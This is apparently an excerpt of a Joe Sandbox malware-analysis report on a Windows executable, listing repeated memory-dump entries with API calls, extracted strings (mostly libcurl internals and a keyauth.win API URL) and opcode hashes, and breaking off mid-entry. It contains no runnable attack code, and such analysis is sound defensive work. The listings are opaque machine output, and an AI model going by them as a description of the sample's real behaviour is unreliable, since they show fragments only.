                                            • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 00007FF7E5A1582B
                                            • ** Resuming transfer from byte position %I64d, xrefs: 00007FF7E5A15818
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: fflush
                                            • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                                            • API String ID: 497872470-664487449
                                            • Opcode ID: cf5752f772f53d5a01ce0a4df43098bbf945ca1bb178d9efa3e48f8af9e2371a
                                            • Instruction ID: f37a1d6217f0058f21c8f8f59e80e9c2036c14038fba15c6965f263ffcb7fb39
                                            • Opcode Fuzzy Hash: cf5752f772f53d5a01ce0a4df43098bbf945ca1bb178d9efa3e48f8af9e2371a
                                            • Instruction Fuzzy Hash: 8D91846170678A85DA60EB16E664BAAB768FB88FC0F851032DE4D87B55FF7CD001DB01
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLastfreememcpy
                                            • String ID: FTP response aborted due to select/poll error: %d$FTP response timeout$We got a 421 - timeout!
                                            • API String ID: 1248052217-2064316097
                                            • Opcode ID: 796fff929338667895051d4d0396df10a4d59ed21fe22401bcd2d6955a7ab080
                                            • Instruction ID: f13f6f1e37489bdeec15033240e0740406933270dbb7635172c77d4eff9ab9ec
                                            • Opcode Fuzzy Hash: 796fff929338667895051d4d0396df10a4d59ed21fe22401bcd2d6955a7ab080
                                            • Instruction Fuzzy Hash: 7541C221B0868A85FA60AF25A821BB9AB91BF48F94FC44133DE5DD7781EE3CD4458712
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: isupper$free
                                            • String ID: %s%lx
                                            • API String ID: 573759493-530121141
                                            • Opcode ID: fd4fe93a63d81f1eee54e4347bacdfe35ba4eeaea70399024db6a6f81961019a
                                            • Instruction ID: 624d6a3b1e64784873fb46c8e005c6f687b300377eb65dad90e035c2f6bae8a3
                                            • Opcode Fuzzy Hash: fd4fe93a63d81f1eee54e4347bacdfe35ba4eeaea70399024db6a6f81961019a
                                            • Instruction Fuzzy Hash: 1031D011B0D59E4DFB22AF249064B7CAF919F05F48F940533C68AC2AA2EE3DD441C722
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: isupper$free
                                            • String ID: TRUE
                                            • API String ID: 573759493-3412697401
                                            • Opcode ID: 84cdeb7f4889b0e98a9bc369abe20393a8c158631b938612cc781c0bb33ba72d
                                            • Instruction ID: ae26894758b809f49e39333fe2076391c2ceb48424795436d5cb9ef1490512a6
                                            • Opcode Fuzzy Hash: 84cdeb7f4889b0e98a9bc369abe20393a8c158631b938612cc781c0bb33ba72d
                                            • Instruction Fuzzy Hash: 6D31D621B0C59A89F711DF24946477CAF919F05F98F840633C69AC26D5DF3CD141C322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: acceptgetsocknameioctlsocket
                                            • String ID: Connection accepted from server$Error accept()ing server connect
                                            • API String ID: 36920154-2331703088
                                            • Opcode ID: 7619af5fcb545d30f50fc730d7ce3b53032e15200c454faa69440dbf7a3349ba
                                            • Instruction ID: f96302fab1288b943db381c3e8864c8b6673b7567459903133560929ef28767b
                                            • Opcode Fuzzy Hash: 7619af5fcb545d30f50fc730d7ce3b53032e15200c454faa69440dbf7a3349ba
                                            • Instruction Fuzzy Hash: C831E82270868586EA64AB21E424BAAB791FF48F94F844232DA6D877C5CF7CE0058711
                                            APIs
                                            • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E5A13B69), ref: 00007FF7E5A141BD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: realloc
                                            • String ID: Failed to alloc memory for big header!$Rejected %zu bytes header (max is %d)!
                                            • API String ID: 471065373-1365219457
                                            • Opcode ID: 7ed45b1ac631cbcc0d59fa2633569d3d6a32ded3c26f3460a93e82a47c38fae9
                                            • Instruction ID: 4e0b46d0f54490dd09167d31feb359c6c3f78a20f05c224f6dda130e8d961ded
                                            • Opcode Fuzzy Hash: 7ed45b1ac631cbcc0d59fa2633569d3d6a32ded3c26f3460a93e82a47c38fae9
                                            • Instruction Fuzzy Hash: 1E216232B08A8986DB04AB29E5507ADA7A1FB49FC4F444036EF4D47B59CF3CD4A1C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$_strdup
                                            • String ID: :
                                            • API String ID: 2653869212-336475711
                                            • Opcode ID: 9185cdd294420f20cdc6d51fd5518084f5bb34101a95b3ad8653fbf82a5b9ae8
                                            • Instruction ID: e425075b928c6f38775d249fc15149b45401af5c85ee17e7b41a25a61ae63ad2
                                            • Opcode Fuzzy Hash: 9185cdd294420f20cdc6d51fd5518084f5bb34101a95b3ad8653fbf82a5b9ae8
                                            • Instruction Fuzzy Hash: CD217C22709B8A85EB61AF14E9507F9B7A0FB44F94F984132DB9D82784EF3CD4648721
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$_strdup
                                            • String ID: :
                                            • API String ID: 2653869212-336475711
                                            • Opcode ID: 7e334ca8de8e4567ccf13a3d1ed7df33fb9ad007e5fdceb3d50289511dc5c3dd
                                            • Instruction ID: b172a86f54eabe4660971014e06ce5a50fe14d6b788902c56dcaf067fc55cb82
                                            • Opcode Fuzzy Hash: 7e334ca8de8e4567ccf13a3d1ed7df33fb9ad007e5fdceb3d50289511dc5c3dd
                                            • Instruction Fuzzy Hash: AF116F22709B8A81EB659F14E6107B9B7A0EB44BA4F984132CF9C82794EF3CD4648721
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %s%s$LIST "%s" *
                                            • API String ID: 0-1744359683
                                            • Opcode ID: 95d0198f69160efcdf6ba9fdb2b660f0347d07b19df1605e49ce1a338d018f18
                                            • Instruction ID: 28e22d1a44bb8665a4047bd5b2da28183fbe4d2304389f6232cfc70a10acae10
                                            • Opcode Fuzzy Hash: 95d0198f69160efcdf6ba9fdb2b660f0347d07b19df1605e49ce1a338d018f18
                                            • Instruction Fuzzy Hash: BE11B161B0864A81EA14EB55E560BB9AB60EF48FC4FC80037EE4E87755DF3CE6458352
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: ErrorLastsend
                                            • String ID: SENT$Sending data failed (%d)
                                            • API String ID: 1802528911-3459338696
                                            • Opcode ID: b305d28b117c5390196270bb9271faa1f7ae2e309369d4ece08cc852aadb9171
                                            • Instruction ID: 9a6cc8c2919ee1ddbbb05119f0f0d20fe9467bf9b0622b4c303983fd02e41db6
                                            • Opcode Fuzzy Hash: b305d28b117c5390196270bb9271faa1f7ae2e309369d4ece08cc852aadb9171
                                            • Instruction Fuzzy Hash: 0901F532708B8A81DB10AB66E851959BF20FF84FC8B895132CB4D83711DF38D501C792
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _strdupfreemalloc
                                            • String ID: Start Date: %s$Start Date
                                            • API String ID: 3985033223-2389359183
                                            • Opcode ID: 0e1e215d465bdb65dc11ec78cd6772c2a7b85769cfe06162245f5a7cea0827dc
                                            • Instruction ID: 023ac23f2d7ae033afeba9c562167f06c0353627b2e80058512b124090e408d3
                                            • Opcode Fuzzy Hash: 0e1e215d465bdb65dc11ec78cd6772c2a7b85769cfe06162245f5a7cea0827dc
                                            • Instruction Fuzzy Hash: 1D017951B0D2CB41EB15A7609464FBDEF926F05F88FC45833CA0E86251DF3CA2448323
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strchr$mallocmemcpy
                                            • String ID:
                                            • API String ID: 320687583-0
                                            • Opcode ID: b21713abedf53e94ceb737acc43def902bdbf09230bbcfd22c0860dc6f8a36b7
                                            • Instruction ID: 68eb73e40e0e7dd3b6c834a0345b2ddb44db369405d1b07ca10f425aaba949c6
                                            • Opcode Fuzzy Hash: b21713abedf53e94ceb737acc43def902bdbf09230bbcfd22c0860dc6f8a36b7
                                            • Instruction Fuzzy Hash: 2C21D55170D69A01EE95A61662207BDEAD29F45FC4F8C8132DE8D8B786DF3CE846C221
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A119B5), ref: 00007FF7E5A115D8
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A119B5), ref: 00007FF7E5A115E1
                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A119B5), ref: 00007FF7E5A1165A
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A119B5), ref: 00007FF7E5A1166B
                                            • memcpy.VCRUNTIME140(?,?,00000000,00007FF7E5A119B5), ref: 00007FF7E5A11694
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$mallocmemcpy
                                            • String ID:
                                            • API String ID: 3401966785-0
                                            • Opcode ID: e5aaf608392412e8d4b9a1dc4236b9329a67fb2d8f166538309d8ae37baf092e
                                            • Instruction ID: 3948ed69cb46b8d123280b7fa366d37f6d227a15b21233328a2f3827a50472eb
                                            • Opcode Fuzzy Hash: e5aaf608392412e8d4b9a1dc4236b9329a67fb2d8f166538309d8ae37baf092e
                                            • Instruction Fuzzy Hash: 71314161B09B4981EB10AF11E660B69AB90EF45FE4F980232DE7E877C5DF3DD8508312
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A30D25), ref: 00007FF7E5A342B6
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A30D25), ref: 00007FF7E5A342D7
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A30D25), ref: 00007FF7E5A342F2
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A30D25), ref: 00007FF7E5A34300
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E5A30D25), ref: 00007FF7E5A34312
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 2024636b2d1604517faee22fc84d3286981bba4572d67bae73b6b26a62bf0446
                                            • Instruction ID: ff1814857cf4997b6a20f6eda9617877b6a3f1a6c982672fc375a2241159b698
                                            • Opcode Fuzzy Hash: 2024636b2d1604517faee22fc84d3286981bba4572d67bae73b6b26a62bf0446
                                            • Instruction Fuzzy Hash: C7119636608B46C2DB04AF65E9A4A3CB7A4FF94F887544136CE4E87768CF38D895C351
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: calloc$free
                                            • String ID: chunked
                                            • API String ID: 171065143-1066005980
                                            • Opcode ID: 1f55bf3cc2ceb97599b1b13bb89cd2425dee7cbd92ad9f3b9547d39331e686ba
                                            • Instruction ID: 9c729f4edeb251f3eec443188f7c2681f9923c994829be251e4933cb8f24c22a
                                            • Opcode Fuzzy Hash: 1f55bf3cc2ceb97599b1b13bb89cd2425dee7cbd92ad9f3b9547d39331e686ba
                                            • Instruction Fuzzy Hash: 9951B421B1869A45FA55AF21A520B79AE91AF04FC8FC94036DE5D837C5EF3CE446C322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: %s: %s$ GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s
                                            • API String ID: 1294909896-2632828617
                                            • Opcode ID: b6ca05796940405e3fa667ad57ad962b43d171910b5195631f7c3f8b4d476eaa
                                            • Instruction ID: 7a5546feb17a47227f8b23e31343c40d1bbde4ef813ab41a577552fb3d7035d0
                                            • Opcode Fuzzy Hash: b6ca05796940405e3fa667ad57ad962b43d171910b5195631f7c3f8b4d476eaa
                                            • Instruction Fuzzy Hash: D341E161B0D69A85EA60AB10A424BBDEF91FF41F94F848033DA8D83745CF3CE4468322
                                            APIs
                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E59ED198), ref: 00007FF7E59ED5AE
                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E59ED198), ref: 00007FF7E59ED5DC
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E59ED198), ref: 00007FF7E59ED645
                                              • Part of subcall function 00007FF7E5A3F1F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-3333333333333333,00007FF7E59E43EE,7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E5A3F20A
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E59ED652
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmallocmemcpymemset
                                            • String ID:
                                            • API String ID: 2942768764-0
                                            • Opcode ID: f485f46759ee3c819f91b3d763993f9dcf21cbb8076185c2af80993c6419b380
                                            • Instruction ID: 4c5183cc13813cba5dcbde375f05fe4238be028ace5696b215e58520b1866718
                                            • Opcode Fuzzy Hash: f485f46759ee3c819f91b3d763993f9dcf21cbb8076185c2af80993c6419b380
                                            • Instruction Fuzzy Hash: B541D472719B4985EA14AF65D1243BDA3A0BB45FA4F948636CB2DC37C8DF3CE0518311
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00007FF7E5A1C9DB), ref: 00007FF7E5A3A88E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: %s
                                            • API String ID: 1294909896-3043279178
                                            • Opcode ID: 0d9a4fbca350a2b51e1a3a6bd17f6e341b6717d5cc9ad04e110af83e92be828a
                                            • Instruction ID: 1ebe3616e293100a7c52d7d748738531f93e2d10dce5196113c1b63893557cd2
                                            • Opcode Fuzzy Hash: 0d9a4fbca350a2b51e1a3a6bd17f6e341b6717d5cc9ad04e110af83e92be828a
                                            • Instruction Fuzzy Hash: 37418222A18B4982EA50DF15B4506AEBBA4FB84FA4F540136DF8E43B61DF3CE095C351
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                            • String ID:
                                            • API String ID: 1775671525-0
                                            • Opcode ID: e60ed55956e50edfbe7ea8bb8067bec7a55e8f8f967eba0faf20a733e55885ad
                                            • Instruction ID: 9df1d78b3db01c73f8cb982229689c375866c29d1cbf063d6181fe618098bccd
                                            • Opcode Fuzzy Hash: e60ed55956e50edfbe7ea8bb8067bec7a55e8f8f967eba0faf20a733e55885ad
                                            • Instruction Fuzzy Hash: 7C31022270D78994EE10AB56A5147A8E691AF04FE0F98073ADF6D8B7D5CF7CE0518322
                                            APIs
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E5A26204
                                              • Part of subcall function 00007FF7E5A05AF0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7E5A05C15
                                              • Part of subcall function 00007FF7E5A05AF0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7E5A05C30
                                            Strings
                                            Memory Dump Source
